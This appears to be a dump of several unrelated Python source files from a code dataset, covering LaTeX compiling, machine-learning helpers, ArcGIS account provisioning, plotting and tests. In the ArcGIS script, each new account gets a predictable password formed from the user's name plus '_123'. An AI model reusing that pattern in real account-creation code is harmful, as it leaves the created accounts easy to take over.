watch\n\nparser = argparse.ArgumentParser(description='Texファイルのオートコンパイル')\nparser.add_argument('-cf', '--config_file', help=\"Configファイルの位置\", default=os.getcwd() + \"/\" + \"latex_auto_compile.conf\")\nparser.add_argument('-w', '--print_warning', help=\"Warningを表示する\", action='store_true')\nparser.add_argument('-t', '--typeset_once', help=\"1回だけタイプセットする\", action='store_true')\nparser.add_argument('-p', '--update_picture', help=\"画像の更新だけする\", action='store_true')\nparser.add_argument('-tp', '--typeset_picture', help=\"1回だけタイプセットする(画像の更新も行う)\", action='store_true')\nparser.add_argument('-rtf', '--rtf', help=\"RTF形式に変換する\", action='store_true')\n\nargs = parser.parse_args()\nwatch = watch.WATCH(args)\nprint(watch.settings)\nif args.rtf is True:\n watch.generate_rtf()\n exit()\nif args.typeset_once is True or args.update_picture is True or args.typeset_picture is True:\n if args.update_picture is True or args.typeset_picture is True:\n watch.update_pdf()\n if args.typeset_once is True or args.typeset_picture is True:\n watch.typeset_once()\nelse:\n watch.watch()\n","sub_path":"latex_auto_compile.py","file_name":"latex_auto_compile.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"147103935","text":"import numpy as np\r\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\r\nfrom sklearn import preprocessing\r\n\r\nclass abt_lda:\r\n def __init__(self, x, n_components, preprocess=True):\r\n self.x = x\r\n self.preprocess = preprocess\r\n self.n_components = n_components\r\n\r\n if self.preprocess:\r\n self.Xscaler = preprocessing.StandardScaler().fit(self.x)\r\n self.x = self.Xscaler.transform(self.x)\r\n\r\n def construct_lda_model(self):\r\n self.lda = LinearDiscriminantAnalysis(self.n_components)\r\n self.lda.fit(self.x)\r\n\r\n def extract_lda_feature(self, x_test):\r\n if self.preprocess:\r\n x_test = self.Xscaler.transform(x_test)\r\n return self.lda.transform(x_test)\r\n\r\n def extract_lda_ratio(self):\r\n\r\n a = self.lda.explained_variance_ratio_\r\n\r\n return a\r\n","sub_path":"space_projection_models/abtlda.py","file_name":"abtlda.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"457698414","text":"from arcgis.mapping import WebMap\nfrom arcgis.gis import GIS\n\nimport datetime\nimport logging\nimport time\nimport json\nimport time\nimport csv\nimport os\n\n\ndef get_config(in_file):\n\n with open(in_file) as config:\n param_dict = json.load(config)\n\n return param_dict\n\n\ndef get_logger(t_dir, s_time):\n\n log = logging.getLogger(__name__)\n log.setLevel(logging.DEBUG)\n\n # Set Logger Time\n logger_date = datetime.datetime.fromtimestamp(s_time).strftime('%Y_%m_%d')\n logger_time = datetime.datetime.fromtimestamp(s_time).strftime('%H_%M_%S')\n\n # Debug Handler for Console Checks - logger.debug(msg)\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.DEBUG)\n log.addHandler(console_handler)\n\n # Ensure Logs Directory Exists\n l_dir = os.path.join(t_dir, 'logs', logger_date)\n if not os.path.exists(l_dir):\n os.makedirs(l_dir)\n\n # Log Handler for Reports - logger.info(msg)\n log_handler = logging.FileHandler(os.path.join(l_dir, 'Report_{}.txt'.format(logger_date)), 'w')\n log_handler.setLevel(logging.INFO)\n log.addHandler(log_handler)\n\n log.info('Script Started: {} - {}\\n'.format(logger_date, logger_time))\n\n return log, l_dir\n\n\ndef create_groups(gis, group):\n\n logger.info('-' * 25)\n logger.info('Creating Groups')\n logger.info('-' * 25)\n\n # Error Set - Capture Fails & Return For CSV Output\n grp_err_set = []\n\n with open(group['csv'], newline='') as the_file:\n\n the_reader = csv.reader(the_file, delimiter=',')\n\n # Skip Header Row\n next(the_reader)\n\n # Build Group For Each Input Row\n for idx, row in enumerate(the_reader):\n\n # Ignore Rows With Missing values\n if len(row) != 3:\n logger.debug('Group Input Row {} Is Invalid'.format(idx))\n logger.debug('Row Values: {}'.format(row))\n continue\n\n else:\n try:\n # Unpack Expected Values & Create Group\n access = group['access']\n title = row[0]\n tags = ','.join(group['tags'] + [row[1]])\n bio = row[2]\n\n new_group = gis.groups.create(\n description=bio,\n access=access,\n title=title,\n tags=tags\n )\n logger.info('Created Group: {}'.format(new_group.title))\n\n except RuntimeError as run_err:\n logger.info('RuntimeError While Creating Group: {}'.format(run_err))\n grp_err_set.append(row)\n\n except Exception as gen_exc:\n logger.info('General Error While Creating Group: {}'.format(gen_exc))\n grp_err_set.append(row)\n\n logger.info('Groups That Could Not Be Created: {}'.format(len(grp_err_set)))\n return grp_err_set\n\n\ndef create_users(gis, user):\n\n logger.info('-' * 25)\n logger.info('Creating Users')\n logger.info('-' * 25)\n\n # Error Set - Capture Fails & Return For CSV Output\n usr_err_set = []\n\n with open(user['csv'], newline='') as the_file:\n\n the_reader = csv.reader(the_file, delimiter=',')\n\n # Skip Header Row\n next(the_reader)\n\n # Build Group For Each Input Row\n for idx, row in enumerate(the_reader):\n\n # Ignore Rows With Missing values\n if len(row) != 5:\n logger.debug('User Input Row {} Is Invalid'.format(idx))\n logger.debug('Row Values: {}'.format(row))\n continue\n\n else:\n try:\n firstname = row[0]\n lastname = row[1]\n email = row[2]\n bio = row[4]\n role = user['role']\n username = '_'.join([firstname, lastname])\n password = '{}_123'.format(username)\n\n new_user = gis.users.create(\n firstname=firstname,\n lastname=lastname,\n username=username,\n password=password,\n description=bio,\n email=email,\n role=role\n )\n logger.info('Created User: {}'.format(new_user.username))\n\n # Fetch Configured Group\n target_group = fetch_target_group(gis, row[3])\n\n # Assign User to Group\n if not target_group:\n logger.info('Could Not Assign User {} to Group'.format(username))\n else:\n user_add = target_group.add_users([username])\n logger.debug('Group Addition: {}'.format(user_add))\n\n except RuntimeError as run_err:\n logger.info('RuntimeError While Creating User: {}'.format(run_err))\n usr_err_set.append(row)\n\n except Exception as gen_exc:\n logger.info('General Error While Creating Group: {}'.format(gen_exc))\n usr_err_set.append(row)\n\n logger.info('Users That Could Not Be Created: {}'.format(len(usr_err_set)))\n return usr_err_set\n\n\ndef fetch_target_group(gis, search_group):\n\n # Get Set of Potential Group Objects\n the_set = gis.groups.search('{}'.format(search_group), max_groups=25)\n\n # Check Set for Matches\n for grp in the_set:\n if grp.title == search_group:\n return grp\n\n # Flag for Logging\n return None\n\n\ndef fetch_all_groups(gis, match_case):\n\n # Search Groups Matching Input Case\n the_set = gis.groups.search('{}*'.format(match_case), max_groups=5000)\n\n # Return List of Group Names\n return [grp.title for grp in the_set]\n\n\ndef fetch_target_map(gis, map_title):\n\n map_set = gis.content.search('{}'.format(map_title))\n\n for m in map_set:\n if m.title == map_title:\n return map_set\n\n return None\n\n\ndef update_web_map(gis, map_item, map_props):\n\n pass\n\n # time.sleep(5)\n\n # web_map_set = gis.content.search('{}'.format(map_item.title))\n # logger.debug(web_map_set)\n\n # wm = WebMap(gis.content.search('{}'.format(map_item.title))[0])\n # wm['operationalLayers'] = map_props['base_urls']\n # save_res = wm.save(item_properties={})\n # logger.debug(save_res)\n\n\ndef create_web_maps(gis, group_set, web_map):\n\n logger.info('-' * 25)\n logger.info('Creating Web Maps')\n logger.info('-' * 25)\n\n for grp_title in group_set:\n\n try:\n title = '{} - {}'.format(web_map['title'], grp_title)\n snippet = web_map['snippet']\n tags = web_map['tags']\n\n # Skip Existing Web Maps\n map_exists = fetch_target_map(gis, title)\n if map_exists:\n logger.info('Web Map Already Exists: {}'.format(title))\n continue\n\n map_item = WebMap().save({\n 'title': title,\n 'snippet': snippet,\n 'tags': tags\n })\n logger.debug(map_item)\n logger.debug(map_item.title)\n\n update_web_map(gis, map_item, web_map)\n\n # Share New Item With Target Group\n share_res = map_item.share(groups=[grp_title])\n\n # Ensure Response Object Has Expected Key\n if not share_res.get('notSharedWith', None):\n logger.info('Issue Creating Web Map')\n continue\n\n # Ensure Web Map Shared Properly\n if len(share_res['notSharedWith']) != 1:\n logger.info('Issue Sharinng Web Map')\n\n except Exception as gen_exc:\n logger.info('General Exception While Creating Web Maps: {}'.format(gen_exc))\n\n\nif __name__ == \"__main__\":\n\n # Get Start Time\n start_time = time.time()\n\n # Get Script Directory\n this_dir = os.path.split(os.path.realpath(__file__))[0]\n\n # Get Logger & Log Directory\n logger, log_dir = get_logger(this_dir, start_time)\n\n # Collect Configured Parameters\n parameters = get_config(os.path.join(this_dir, 'config.json'))\n web_map = parameters['web_map']\n portal = parameters['portal']\n group = parameters['group']\n user = parameters['user']\n\n # Get GIS Connection\n gis = GIS(portal['path'], portal['user'], portal['pass'])\n logger.debug('Connected: {}\\n'.format(gis))\n\n # # Create Groups\n # group_error_set = create_groups(gis, group)\n #\n # # Create Users & Assign to Groups\n # user_error_set = create_users(gis, user)\n\n # Collect All Existing Contractor Groups\n group_set = fetch_all_groups(gis, 'Contractor')\n\n # Handle Web Map Generation & Assign to Group\n create_web_maps(gis, group_set, web_map)\n\n # Log Run Time\n logger.info('\\nProgram Run Time: {0} Minutes'.format(round(((time.time() - start_time) / 60), 2)))\n","sub_path":"usr_grp_runner.py","file_name":"usr_grp_runner.py","file_ext":"py","file_size_in_byte":9008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"193199891","text":"from collections import defaultdict\nfrom collections import OrderedDict\nfrom IPython import embed\nfrom tqdm import tqdm\nimport torch\nimport numpy as np\nfrom data import *\nfrom itertools import chain\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import precision_recall_fscore_support\nimport fasttext\n\nclass Pos:\n def __init__(self):\n self.word = 0\n self.label = 3\n self.pos = 4\n\nclass Features:\n def __init__(self):\n self.emb_path = '../../../embedding/glove.6B.100d.txt'\n self.corpus_dir = '../../Data/formatted/'\n self.corpus_pkl = \"./corpus.io.pkl\"\n self.encoder_pkl = \"./encoder.io.pkl\"\n self.corpus = Corpus.get_corpus(self.corpus_dir, self.corpus_pkl)\n self.encoder = Encoder.get_encoder(self.corpus, self.emb_path, self.encoder_pkl)\n # self.model = fasttext.load_model(\"result/fil9.bin\")\n self.model = None\n\n def word_pos(self,tag, pos_tags):\n pos_emb = []\n for pos in pos_tags:\n if tag == pos:\n pos_emb.append(1)\n else:\n pos_emb.append(0)\n return pos_emb\n\n def word_emb(self,word,glove_emb=True):\n if glove_emb:\n emb = self.encoder.word_emb[self.encoder.word2index[word]]\n else:\n emb = self.model.get_word_vector(word)\n return emb\n\n def generate_features(self,filename, pos_tags = None,prev_count=1,next_count=1,glove_emb=True):\n pos_obj = Pos()\n ip_file = filename\n X_split, y_split = [], []\n keylist = []\n word_dict = defaultdict(list) #key:sentence_word_id; value:[\"word\",pos_tag,predicted_label]\n\n with open(ip_file, 'r') as fp:\n lines = [line.split() for line in fp]\n\n #generate list of unique pos-tags\n if pos_tags is None:\n pos_tags = []\n for i in lines:\n if i:\n pos_tags.append(i[4])\n\n pos_tags = list(set(pos_tags))\n\n #generate feature dict\n #outer-counter handles lines, inner-counter handles each word in line\n outer_counter = 0\n for sentence in lines:\n if not sentence: #handles blank lines; separator between different sentences\n inner_counter = 1\n outer_counter+=1\n else:\n word_id = str(outer_counter)+\"_\"+str(inner_counter)\n word = sentence[pos_obj.word]\n pos = sentence[pos_obj.pos]\n y = sentence[pos_obj.label]\n keylist.append(word_id)\n word_dict[word_id].append(word)\n word_dict[word_id].append(pos)\n word_dict[word_id].append(y)\n inner_counter+=1\n key_indices = list(enumerate(word_dict))\n # current_key = key_indices[0][1]\n sentence_features = defaultdict(list)\n sentence_probs = defaultdict(list)\n for index,key in tqdm(key_indices):\n outer, inner = key.split(\"_\")\n #prev pos embedding\n # prev_pos_emb = [0] * len(pos_tags) * prev_count\n if inner==\"1\": #handles first word with no-prev embedding\n prev_pos_emb = [0] * len(pos_tags) * prev_count\n\n else:\n prev_pos_emb = []\n for i in range(prev_count+1):\n if i!=0 and index-i >=0:\n prev_pos = word_dict[keylist[index-i]][1]\n prev_pos_emb.extend(self.word_pos(prev_pos, pos_tags))\n elif index-i<0:\n prev_pos_emb.extend([0]*len(pos_tags))\n\n\n #current pos embedding\n cur_pos = word_dict[key][1]\n cur_pos_emb = self.word_pos(cur_pos, pos_tags)\n\n\n #next pos embedding\n next_outer = str(int(outer)+1)+\"_1\"\n try:\n next_pos_emb=[]\n for i in range(next_count+1):\n if next_outer == keylist[index+i] or next_outer.split(\"_\")[0] == keylist[index+i].split(\"_\")[0]:\n next_pos_emb = [0] * len(pos_tags) * next_count\n elif i!=0:\n # next_pos_emb = []\n next_pos = word_dict[keylist[index+i]][1]\n next_pos_emb.extend(self.word_pos(next_pos, pos_tags))\n except:\n next_pos_emb = [0] * len(pos_tags) * next_count\n\n # get word-embedding for particular word\n word_vector = list(self.word_emb(word_dict[key][0],glove_emb))\n f_prev,f_cur,f_next = len(prev_pos_emb), len(cur_pos_emb),len(next_pos_emb)\n #X_train\n feature_vector = word_vector+prev_pos_emb+cur_pos_emb+next_pos_emb\n\n X_split.append(feature_vector)\n sentence_features[outer].append(feature_vector)\n\n #y-values\n true_y = 1 if float(word_dict[key][2]) >= 0.5 else 0\n sentence_probs[outer].append(float(word_dict[key][2]))\n\n #y-train\n y_split.append(true_y)\n return X_split, y_split, [sentence_features, sentence_probs, word_dict], pos_tags\n\n def predict_score(self,predicted_scores,true_label):\n match_m_score = match_M(predicted_scores,true_label)\n top_k_score = topK(predicted_scores,true_label)\n return match_m_score, top_k_score","sub_path":"logistic/Code/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":5431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"249076237","text":"import numpy as np\n\nfrom ... import Operation as opmod \nfrom ...Operation import Operation\n\nclass CSVToArray(Operation):\n \"\"\"\n Read a csv-formatted file into a numpy array.\n \"\"\"\n\n def __init__(self):\n input_names = ['path']\n output_names = ['array']\n super(CSVToArray, self).__init__(input_names, output_names)\n self.input_doc['path'] = \"path to .csv file\"\n self.output_doc['array'] = \"numpy array built from csv file contents\"\n\n def run(self):\n path = self.inputs['path']\n if path is None:\n return\n self.outputs['array'] = np.loadtxt(path, dtype=float, delimiter=',')\n\n\n","sub_path":"paws/core/operations/IO/CSV/CSVToArray.py","file_name":"CSVToArray.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"568628641","text":"from Looped_CV_Data import plot_looped_data\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\ndirectory = '/Users/st659/Google Drive/Cell Chamber Ref Test 02-12-16'\ndirectory2 = '/Users/st659/Google Drive/Cell 1 Reference Measurement'\nvoltage_list, current_list =plot_looped_data(directory)\n\n\nmax_current_list = list()\nmax_voltage_list = list()\nfor current, voltage in zip(current_list, voltage_list):\n max_current = max(current)\n max_current_arg = np.argmax(current)\n max_current_list.append(max_current)\n max_voltage_list.append(voltage[max_current_arg])\n\ntime_points = np.linspace(0,len(max_current_list)*10, num=len(max_current_list))\nplt.style.use(['seaborn-white','seaborn-poster'])\nfig = plt.figure()\nax = fig.add_subplot(111)\nfor volt, curr in zip(voltage_list, current_list):\n ax.plot(volt,curr)\nax.set_xlabel('Voltage (V)')\nax.set_ylabel('Current (mA)')\nax.set_title('Cyclic Voltammetry of On Chip Electrode Array of 100 $\\mu$M Methylene Blue over 6 Hours', y=1.04)\n#plt.savefig(os.path.join(directory,'CV On Chip MB 28-11-16 300dpi.png'), dpi=300)\nfig2 = plt.figure()\nax2 = fig2.add_subplot(111)\nax3 = ax2.twinx()\n\n\ntime= list()\nfor num in time_points:\n time.append(num)\n\n\nax2.plot(time, max_current_list, label='Current')\n\nax3.plot(time, max_voltage_list, color='r', label='Voltage')\n\n\naverage_voltage = np.full(( len(max_voltage_list),1),np.mean(max_voltage_list,axis=0))\nstd_dev_1 = np.full((len(max_voltage_list),1), np.mean(max_voltage_list,axis=0) + np.std(max_voltage_list,axis=0))\nstd_dev_2 = np.full((len(max_voltage_list),1), np.mean(max_voltage_list,axis=0) - np.std(max_voltage_list,axis=0))\nprint(len(average_voltage))\nax3.plot(time, average_voltage, color='g', linestyle='--')\nax3.plot(time, std_dev_1, color='k', linestyle='--')\nax3.plot(time, std_dev_2, color='k', linestyle='--')\n\nprint(np.mean(max_voltage_list,axis=0))\nprint(np.std(max_voltage_list,axis=0))\nprint(max_voltage_list)\nax2.set_title('Maximum Current and Corresponding Voltage of CV of 100 $\\mu$M Methylene Blue over 6 Hours', y=1.04)\nax2.set_xlabel('Time (Mins)')\nax2.set_ylabel('Current (mA)')\nax3.set_ylabel('Voltage (V)')\nax2.legend(loc=(0.1,0.15))\nax3.legend(loc=(0.1,0.1))\n#plt.savefig(os.path.join(directory,'Max current On Chip MB 28-11-16 300dpi.png'), dpi=300)\nplt.show()","sub_path":"Cell Ref Test 6-12-16.py","file_name":"Cell Ref Test 6-12-16.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"80555764","text":"import numpy as np\nimport pytest\nfrom pytest import approx\nfrom pyriemann.utils.mean import (\n mean_riemann,\n mean_euclid,\n mean_logeuclid,\n mean_logdet,\n mean_ale,\n mean_identity,\n mean_covariance,\n mean_kullback_sym,\n mean_harmonic,\n mean_wasserstein,\n mean_alm,\n)\nfrom pyriemann.utils.geodesic import geodesic_riemann\n\n\ndef generate_cov(n_trials, n_channels):\n \"\"\"Generate a set of cavariances matrices for test purpose\"\"\"\n rs = np.random.RandomState(1234)\n diags = 2.0 + 0.1 * rs.randn(n_trials, n_channels)\n A = 2 * rs.rand(n_channels, n_channels) - 1\n A /= np.linalg.norm(A, axis=1)[:, np.newaxis]\n covmats = np.empty((n_trials, n_channels, n_channels))\n for i in range(n_trials):\n covmats[i] = A @ np.diag(diags[i]) @ A.T\n return covmats, diags, A\n\n\n@pytest.mark.parametrize(\n \"mean\",\n [\n mean_riemann,\n mean_logeuclid,\n mean_euclid,\n mean_identity,\n mean_logdet,\n mean_ale,\n mean_kullback_sym,\n mean_harmonic,\n mean_wasserstein,\n ],\n)\ndef test_mean_shape(mean):\n \"\"\"Test the shape of mean\"\"\"\n n_trials, n_channels = 5, 3\n covmats, _, A = generate_cov(n_trials, n_channels)\n C = mean(covmats)\n assert C.shape == (n_channels, n_channels)\n\n\n@pytest.mark.parametrize(\"mean\", [mean_riemann, mean_logdet])\ndef test_mean_shape_with_init(mean):\n \"\"\"Test the shape of mean with init\"\"\"\n n_trials, n_channels = 5, 3\n covmats, _, A = generate_cov(n_trials, n_channels)\n C = mean(covmats, init=covmats[0])\n assert C.shape == (n_channels, n_channels)\n\n\n@pytest.mark.parametrize(\"init\", [True, False])\ndef test_riemann_mean(init):\n \"\"\"Test the riemannian mean\"\"\"\n n_trials, n_channels = 100, 3\n covmats, diags, A = generate_cov(n_trials, n_channels)\n if init:\n C = mean_riemann(covmats, init=covmats[0])\n else:\n C = mean_riemann(covmats)\n Ctrue = np.exp(np.log(diags).mean(0))\n Ctrue = A @ np.diag(Ctrue) @ A.T\n assert C == approx(Ctrue)\n\n\ndef test_euclid_mean():\n \"\"\"Test the euclidean mean\"\"\"\n n_trials, n_channels = 100, 3\n covmats, _, _ = generate_cov(n_trials, n_channels)\n C = mean_euclid(covmats)\n assert C == approx(covmats.mean(axis=0))\n\n\ndef test_identity_mean():\n \"\"\"Test the identity mean\"\"\"\n n_trials, n_channels = 100, 3\n covmats, _, _ = generate_cov(n_trials, n_channels)\n C = mean_identity(covmats)\n assert np.all(C == np.eye(n_channels))\n\n\ndef test_alm_mean():\n \"\"\"Test the ALM mean\"\"\"\n n_trials, n_channels = 3, 3\n covmats, _, _ = generate_cov(n_trials, n_channels)\n C_alm = mean_alm(covmats)\n C_riem = mean_riemann(covmats)\n assert C_alm == approx(C_riem)\n\n\ndef test_alm_mean_maxiter():\n \"\"\"Test the ALM mean with max iteration\"\"\"\n n_trials, n_channels = 3, 3\n covmats, _, _ = generate_cov(n_trials, n_channels)\n C = mean_alm(covmats, maxiter=1, verbose=True) # maxiter reached\n assert C.shape == (n_channels, n_channels)\n\n\ndef test_alm_mean_2trials():\n \"\"\"Test the ALM mean with 2 trials\"\"\"\n n_trials, n_channels = 2, 3\n covmats, _, _ = generate_cov(n_trials, n_channels)\n C = mean_alm(covmats) # n_trials=2\n assert np.all(C == geodesic_riemann(covmats[0], covmats[1], alpha=0.5))\n\n\n@pytest.mark.parametrize(\n \"metric, mean\",\n [\n (\"riemann\", mean_riemann),\n (\"logdet\", mean_logdet),\n (\"logeuclid\", mean_logeuclid),\n (\"euclid\", mean_euclid),\n (\"alm\", mean_alm),\n (\"identity\", mean_identity),\n (\"wasserstein\", mean_wasserstein),\n (\"ale\", mean_ale),\n (\"harmonic\", mean_harmonic),\n (\"kullback_sym\", mean_kullback_sym),\n ],\n)\ndef test_mean_covariance_metric(metric, mean):\n \"\"\"Test mean_covariance for metric\"\"\"\n n_trials, n_channels = 3, 3\n covmats, _, _ = generate_cov(n_trials, n_channels)\n C = mean_covariance(covmats, metric=metric)\n Ctrue = mean(covmats)\n assert np.all(C == Ctrue)\n","sub_path":"tests/test_utils_mean.py","file_name":"test_utils_mean.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"500622627","text":"#!python\n# -*- coding: utf-8 -*-#\n\"\"\"\nAdd given psf to random places of a cluster.\n\n@author: Bhishan Poudel\n\n@date: Feb 14, 2018\n\n\"\"\"\n# Imports\nimport os, sys\nimport numpy as np\nimport random\nfrom astropy import wcs\nfrom astropy.io import fits\nfrom astropy.io.fits import getheader\n\ndef add_psf_to_cluster(EXPTIME,n_psf,psf,cluster,o_cluster):\n \n # Read psf\n psf_hdu = fits.open(psf)\n\n # Read cluster\n cluster_hdu = fits.open(cluster)\n cluster_hdu[0].data = cluster_hdu[0].data/EXPTIME\n\n # shape\n # NOTE: NAXIS = 2 means data has two axes\n NAXIS1p = getheader(psf)['NAXIS1'] # eg. 4000\n NAXIS1c = getheader(cluster)['NAXIS1'] \n # print(\"NAXIS1p = {}\".format(NAXIS1p))\n # print(\"NAXIS1c = {}\".format(NAXIS1c))\n\n # Assert fitsfiles are square shaped\n assert NAXIS1p == psf_hdu[0].data.shape[0] == psf_hdu[0].data.shape[1]\n assert NAXIS1c == cluster_hdu[0].data.shape[0] == cluster_hdu[0].data.shape[1]\n\n\n # Randomly put psf inside the cluster\n for i in range(0,n_psf):\n x = random.randint(NAXIS1p,NAXIS1c-NAXIS1p)\n y = random.randint(NAXIS1p,NAXIS1c-NAXIS1p)\n cluster_hdu[0].data[y:y+NAXIS1p, x:x+NAXIS1p] += psf_hdu[0].data\n\n # Get fake wcs from astropy\n w = wcs.WCS(naxis=2)\n w.wcs.crpix = [1800.0, 1800.0]\n w.wcs.crval = [0.1, 0.1]\n w.wcs.cdelt = np.array([-5.55555555555556E-05,5.55555555555556E-05])\n w.wcs.ctype = [\"RA---TAN\", \"DEC--TAN\"]\n wcs_hdr = w.to_header()\n \n # Add fake wcs to header of output file\n hdr = cluster_hdu[0].header\n hdr += wcs_hdr\n \n # Add exptime\n hdr['EXPTIME'] = EXPTIME\n cluster_hdu[0].header = hdr\n\n # Write output file\n cluster_hdu.writeto(o_cluster,clobber=True)\n cluster_hdu.close()\n psf_hdu.close()\n \n # Print\n print('{} PSFs added to the galaxy cluster: {}'.format(n_psf,o_cluster))\n\ndef main():\n \"\"\"Run main function.\"\"\"\n \n # variables\n EXPTIME = 6000.0\n n_psf = 200\n\n # psf and cluster\n psf = '../psf/psf_LSST20000.fits'\n psf = '../../psfb.fits'\n cluster = '../data/lsst_z0.7_0.fits'\n o_cluster = '../edited_data/wcs_psf_' + os.path.basename(cluster)\n \n add_psf_to_cluster(EXPTIME,n_psf,psf,cluster,o_cluster) \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/add_psf_wcs.py","file_name":"add_psf_wcs.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"225698804","text":"from __future__ import division\nfrom settings import *\nfrom tuner import *\nfrom scikitlearners2 import *\nfrom sklearn.grid_search import ParameterGrid\n\n# __author__ = 'Wei'\n\nclass Learner(object):\n def __init__(i, train, tune, test):\n i.train = train\n i.tune = tune\n i.test = test\n\n def untuned(i):\n The.data.predict = i.test\n The.data.train = [i.train, i.tune]\n i.default()\n The.option.tuning = False\n score = i.call()\n return score\n\n def tuned(i):\n The.data.predict = i.tune\n The.data.train = i.train\n The.option.tuning = True\n i.optimizer()\n The.option.tuning = False\n The.data.predict = i.test\n score = i.call()\n return score\n\n def gridsearch(i):\n The.data.predict = i.tune\n The.data.train = i.train\n The.option.tuning = True\n score_all = []\n param_grids = ParameterGrid(i.grid_parameters()[0])\n for each in param_grids:\n i.default(**each)\n score_all.append(i.call()[-1][The.option.tunedobjective]) # the last one is the list for defective score\n param_best = param_grids[score_all.index(max(score_all))]\n print(\"GridSearch Best Parameters: \", str(param_best))\n writefile(\"GridSearch Best Parameters: \"+str(param_best))\n The.option.tuning = False\n The.data.predict = i.test\n i.default(**param_best)\n score = i.call()\n return score\n\n def call(i):\n raise NotImplementedError\n\n def optimizer(i):\n raise NotImplementedError\n\n def default(i):\n raise NotImplementedError\n\n\nclass Where(Learner):\n def __init__(i, train, tune, predict):\n super(Where, i).__init__(train, tune, predict)\n i.tunelst = [\"The.tree.infoPrune\", \"The.tree.min\", \"The.option.threshold\",\n \"The.where.wriggle\", \"The.where.depthMax\",\n \"The.where.depthMin\", \"The.option.minSize\", \"The.tree.prune\",\n \"The.where.prune\"]\n i.tune_min = [0.01, 1, 0.01, 0.01, 1, 1, 0.01, True, False]\n i.tune_max = [1, 10, 1, 1, 20, 6, 1, True, False]\n\n def default(i, info_prune=0.33, threshold=0.5, min=4, min_size=0.5,\n depth_min=2, depth_max=10, wriggle=0.2, where_prune=False,\n tree_prune=True):\n The.option.baseLine = True\n The.tree.infoPrune = info_prune\n The.option.threshold = threshold\n The.tree.min = min\n The.option.minSize = min_size # min leaf size\n The.where.depthMin = depth_min # no pruning till this depth\n The.where.depthMax = depth_max # max tree depth\n The.where.wriggle = wriggle # set this at init()\n The.where.prune = where_prune # pruning enabled?\n The.tree.prune = tree_prune\n\n def grid_parameters(self):\n return [{'info_prune': [0.01, 0.33, 0.99], 'threshold': [0.01, 0.5, 1],\n 'min': [1, 5, 10], 'min_size': [0.01, 0.5, 1.0],\n 'depth_min': [1, 3, 6], 'depth_max': [1, 10, 20],\n 'wriggle': [0.01, 0.5, 1.0], 'where_prune': [False, True],\n 'tree_prune': [False, True]}]\n\n def call(i): return main()\n\n def optimizer(i):\n tuner = WhereDE(i)\n tuner.DE()\n\n\nclass CART(Learner):\n def __init__(i, train, tune, predict):\n super(CART, i).__init__(train, tune, predict)\n i.tunelst = [\"The.cart.max_features\", \"The.cart.max_depth\",\n \"The.cart.min_samples_split\", \"The.cart.min_samples_leaf\",\n \"The.option.threshold\"]\n i.tune_min = [0.01, 1, 2, 1, 0.01]\n i.tune_max = [1, 50, 20, 20, 1]\n\n def default(i, max_features=None, max_depth=None, min_samples_split=2,\n min_samples_leaf=1, threshold=0.5):\n The.cart.max_features = max_features\n The.cart.max_depth = max_depth\n The.cart.min_samples_split = min_samples_split\n The.cart.min_samples_leaf = min_samples_leaf\n The.option.threshold = threshold\n\n def grid_parameters(self):\n return [{'max_features': [0.01, 0.15, 0.5, 0.75, 0.99], 'max_depth': [1, 13, 25, 37,50],\n 'min_samples_split': [1, 6,11,16, 20],\n 'min_samples_leaf': [2, 5,6,15, 20], 'threshold': [0.01, 0.25, 0.5,0.75, 1.0]}]\n\n def call(i):\n return cart()\n\n def optimizer(i):\n tuner = CartDE(i)\n tuner.DE()\n\n\nclass RF(Learner):\n def __init__(i, train, tune, predict):\n super(RF, i).__init__(train, tune, predict)\n i.tunelst = [\"The.rf.min_samples_split\", \"The.rf.min_samples_leaf \",\n \"The.rf.max_leaf_nodes\", \"The.rf.n_estimators\",\n \"The.rf.max_features\", \"The.option.threshold\"]\n i.tune_min = [1, 2, 10, 50, 0.01, 0.01]\n i.tune_max = [20, 20, 50, 150, 1, 1]\n i.default_value = [2, 1, None, 100, \"auto\", 0.5]\n\n def default(i, threshold=0.5, max_features=\"auto\", min_samples_split=2,\n min_samples_leaf=1, max_leaf_nodes=None, n_estimators=100):\n # for key,val in zip(i.tunelst,i.default_value):\n # setattr(key[],key[4:],val)\n # pdb.set_trace()\n The.option.threshold = threshold\n The.rf.max_features = max_features\n The.rf.min_samples_split = min_samples_split\n The.rf.min_samples_leaf = min_samples_leaf\n The.rf.max_leaf_nodes = max_leaf_nodes\n The.rf.n_estimators = n_estimators\n\n def grid_parameters(self):\n return [\n {'n_estimators': [50, 75,100,125, 150], 'max_features': [0.01, 0.15, 0.50, 0.75, 0.99],\n 'min_samples_split': [1, 5,10,15, 21], 'min_samples_leaf': [2,7, 12,16, 21],\n 'max_leaf_nodes': [10, 20,30, 40, 50], 'threshold': [0.01, 0.25, 0.5, 0.75,1.0]}]\n\n def call(i):\n return rf()\n\n # class RF_classifier(RF):\n # def __init__(i,train,tune,predict):\n # super(RF_classifier, i).__init__(train,tune,predict)\n #\n # def call(i): return rf_classifier()\n\n\n def optimizer(i):\n tuner = RfDE(i)\n tuner.DE()\n","sub_path":"version1.0/learner.py","file_name":"learner.py","file_ext":"py","file_size_in_byte":5631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"369444057","text":"from 